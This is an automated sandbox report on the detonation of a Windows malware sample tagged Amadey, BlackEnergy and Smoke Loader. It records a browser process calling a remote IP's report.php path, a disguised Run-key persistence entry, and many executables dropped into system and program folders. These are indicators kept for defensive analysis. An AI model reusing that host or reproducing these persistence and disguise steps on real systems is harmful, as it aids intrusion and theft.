Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31190236" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3110522722" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "458396011" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\KnownProvidersUpgradeTime = 04e1a46c61e1db01 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000a92ebaefda676c3cf1f88b3f03cf4cfd50374ce163bcd74264df8f5eb3abfdf7000000000e8000000002000020000000f5cf0470a654ebb77198dca200e79cb0059f899522a6582889b4f6507c77f64620000000b1d2dee799cf063bc2efe1dd2bca8e42cede970198565944e065c2c8d2bbc644400000008a13a62bf9506fa8e3f31571745fb699b722715675df43d2e9d357d082423cee6c10a73c7d87db1c4466c7fab00e144dab280aeab8788b1f87d8eaef483fd798 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0770cbedcecdb01 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3111772701" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1039f2bddcecdb01 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000002147bd6711c293e91a3240266def873b3e3f177687b0a3767fff8fa8bd9a73d1000000000e800000000200002000000012b454777a0fd43af460831f603c2f1e0a99370245d4b54e8dcbe55136a24cf62000000025fda31e71e4fd8da126ff800a0fd79bd26618de86d4b806ade683151b9b09054000000045cfbe898ae8e4e2dcfc6d3eed5523b29f474860c48a17bfea156219260e49280066ae7e125249eb683b6ddecbffe4fd4a2be54c6d8c12c6bde28bd8f384b674 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = … C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\IEXPLORE.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe

"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"

C:\Program Files\Internet Explorer\IEXPLORE.exe

"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4292 CREDAT:17410 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ÔN@

Network

Country Destination Domain Proto
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
GB 2.18.27.89:443 www.bing.com tcp
GB 2.18.27.89:443 www.bing.com tcp
US 150.171.27.10:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Program Files\7-Zip\7z.exe


C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico


C:\Users\Admin\AppData\Local\Temp\Kno6244.tmp


C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0


C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0


C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G9B4MDE2\suggestions[1].en-US


Analysis: behavioral2

Detonation Overview

Submitted

2025-07-04 12:10

Reported

2025-07-04 12:13

Platform

win11-20250619-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\cmd.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\dfrgui.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\mcbuilder.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\mmc.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\poqexec.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\RdpSaProxy.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\TpmTool.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\where.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\notepad.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\TSTheme.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\TSTheme.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tttracer.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\certreq.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\Com_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\MRINFO.EXE_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\notepad.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\certreq.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\printui.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\expand.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SystemPropertiesProtection.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tcmsetup.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\mcbuilder.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\powercfg.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\raserver.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SystemPropertiesRemote.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\taskkill.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\comp.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\Dism.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\fsutil.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\secinit.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SpatialAudioLicenseSrv.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SystemUWPLauncher.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ByteCodeGenerator.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\cleanmgr.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ieUnatt.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\Msdtc\Trace\msdtcvtr.bat C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tasklist.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\userinit.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\F12\IEChooser.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\agentactivationruntimestarter.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\choice.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\dccw.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\IME\IMETC\IMTCPROP.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tar.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\cleanmgr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\DevicePairingWizard.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\eudcedit.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\forfiles.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\PhotoScreensaver.scr C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\setupugc.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\timeout.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\eventvwr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\PING.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\replace.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\srdelayed.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\user.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\WerFault.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\cmmon32.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tar.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\odbcconf.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\relog.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Media Player\wmpconfig.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\wordicon.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Windows Media Player\wmplayer.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\pwahelper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\identity_helper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateBroker.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\java.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmadminicon.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\elevation_service.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\klist.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\notification_click_helper.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
